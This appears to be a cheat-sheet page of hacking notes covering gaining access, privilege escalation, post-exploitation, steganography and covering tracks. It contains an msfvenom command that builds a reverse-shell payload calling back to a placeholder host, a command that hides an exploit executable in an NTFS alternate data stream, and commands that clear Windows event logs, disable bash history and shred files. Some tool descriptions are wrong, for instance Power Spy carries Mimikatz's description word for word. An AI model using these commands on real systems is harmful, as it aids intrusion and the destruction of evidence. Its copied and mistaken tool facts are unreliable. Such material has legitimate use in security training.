🖥️ System Hacking

System hacking is the process of gaining unauthorized access to a target’s systems and applications.

Gaining access

Gaining access is the process of exploiting vulnerabilities in a target’s systems and applications to gain unauthorized access.

Responder Responder is a tool used to capture NTLMv1 and NTLMv2 hashes from Windows systems.

L0pthCrack L0pthCrack is a password auditing and recovery tool.

Armitage Armitage is a graphical cyber attack management tool for Metasploit.

Ninja Jonin A general-purpose fully customizable software to control a remote computer behind any NAT, Firewall and proxy.

ImmunityDebugger Immunity Debugger is a powerful way to write exploits, analyze malware, and reverse engineer binary files.

Metasploit

Metasploit is a penetration testing framework that allows security professionals to find and exploit vulnerabilities in systems and applications.

# Generate a reverse tcp payload for Windows
msfvenom -p windows/meterpreter/reverse_tcp --platform windows \
    -a x86 -o file.exe LHOST=YOUR_IP LPORT=YOUR_PORT

Metasploit Metasploit is a penetration testing framework.

Exploit sites

Exploit sites are repositories of information about known vulnerabilities in software and hardware.

ExploitDB

VulDB

Vulners

CIRCL CVE Search

CVE Details

Privilege escalation

Privilege escalation is the process of gaining higher privileges on a target’s system or application.

Metasploit Metasploit is a penetration testing framework.

Mimikatz Mimikatz is a tool for extracting plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory.

Post-exploitation

Post-exploitation is the process of maintaining access to a target’s system or application after gaining unauthorized access.

Power Spy Power Spy is a tool for extracting plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory.

Spytech SpyAgent Spytech SpyAgent is a powerful computer monitoring software.

Covert TCP Covert TCP is a tool for creating covert channels over TCP.

NTFS Alternate Data Streams

NTFS streams are a feature of the NTFS file system that allows files to contain multiple streams of data.

This can be used to hide data within a file without altering its size or appearance.

# Create a file with an alternate data stream
echo "This is a hidden message" > file.txt:stream

# Insert a file as an alternate data stream
type exploit.exe > file.txt:file.exe

White space stenography

White space stenography is the process of hiding data by using white space characters in a file.

snow -C -m "I am lying" -p "hello world" input.txt output.txt

snow Text-based steganography that uses whitespace to conceal information.

Image steganography

Image steganography is the process of hiding data within an image file.

OpenStego OpenStego is a free and open-source software for image steganography.

Stegonline Stegonline is a web-based tool for image steganography.

QuickStego QuickStego is a free and easy-to-use software for image steganography.

Clear logs and data

Clear logs is the process of deleting or modifying logs on a target’s system or application to cover tracks.

DBAN Darik's Boot and Nuke is a free data destruction program.

CCleaner CCleaner is a utility program used to clean potentially unwanted files and invalid Windows Registry entries from a computer.

Windows

# Clear logs using auditpol
# https://learn.microsoft.com/it-it/windows-server/administration/windows-commands/auditpol
auditpol /clear /y

# Clear logs using wevtutil
# https://learn.microsoft.com/it-it/windows-server/administration/windows-commands/wevtutil
wevtutil cl System
wevtutil cl Application
# ...

# Encrypt deleted data using cipher
# https://learn.microsoft.com/it-it/windows-server/administration/windows-commands/cipher
cipher /w:C:

Clear Event Viewer Logs Clear Event Viewer Logs is a tool for clearing event logs on Windows systems.

Linux

# Disable bash history
export HISTSIZE=0

# Clear bash history
history -c # all
history -w # current session

# Shred a file making it unrecoverable
shred file.txt